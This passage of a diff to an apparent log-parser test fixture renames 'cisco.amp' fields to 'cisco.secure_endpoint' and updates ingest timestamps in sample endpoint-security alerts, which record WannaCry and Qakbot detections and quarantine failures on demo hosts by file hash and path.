Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4982,7 +4982,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -5048,7 +5048,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510442708Z",
+                "ingested": "2021-09-27T00:41:33.421031681Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -5058,7 +5058,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -5119,7 +5119,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510444555Z",
+                "ingested": "2021-09-27T00:41:33.421033406Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -5129,7 +5129,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -5194,7 +5194,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510446430Z",
+                "ingested": "2021-09-27T00:41:33.421035144Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -5204,7 +5204,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -5269,7 +5269,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510448315Z",
+                "ingested": "2021-09-27T00:41:33.421036982Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -5279,7 +5279,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -5346,7 +5346,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510450164Z",
+                "ingested": "2021-09-27T00:41:33.421038738Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -5357,7 +5357,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "Auto.BAC7BC5281.in10.tht.Talos",
                     "computer": {
                         "active": true,
@@ -5425,7 +5425,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510452021Z",
+                "ingested": "2021-09-27T00:41:33.421040475Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -5436,7 +5436,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "Auto.BAC7BC5281.in10.tht.Talos",
                     "computer": {
                         "active": true,
@@ -5508,7 +5508,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:04.510453895Z",
+                "ingested": "2021-09-27T00:41:33.421042251Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -5519,7 +5519,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "Auto.BAC7BC5281.in10.tht.Talos",
                     "computer": {
                         "active": true,
@@ -5581,7 +5581,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510455739Z",
+                "ingested": "2021-09-27T00:41:33.421043996Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -5591,7 +5591,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -5656,7 +5656,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510457608Z",
+                "ingested": "2021-09-27T00:41:33.421045731Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -5666,7 +5666,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -5731,7 +5731,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510459484Z",
+                "ingested": "2021-09-27T00:41:33.421047484Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -5741,7 +5741,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -5806,7 +5806,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510461339Z",
+                "ingested": "2021-09-27T00:41:33.421049240Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -5816,7 +5816,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -5881,7 +5881,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510463204Z",
+                "ingested": "2021-09-27T00:41:33.421050976Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -5891,7 +5891,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -5956,7 +5956,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510465143Z",
+                "ingested": "2021-09-27T00:41:33.421052916Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -5966,7 +5966,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -6031,7 +6031,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510467022Z",
+                "ingested": "2021-09-27T00:41:33.421054684Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6041,7 +6041,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -6106,7 +6106,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510468869Z",
+                "ingested": "2021-09-27T00:41:33.421056465Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6116,7 +6116,7 @@
                 ]
             },
             "cisco": {
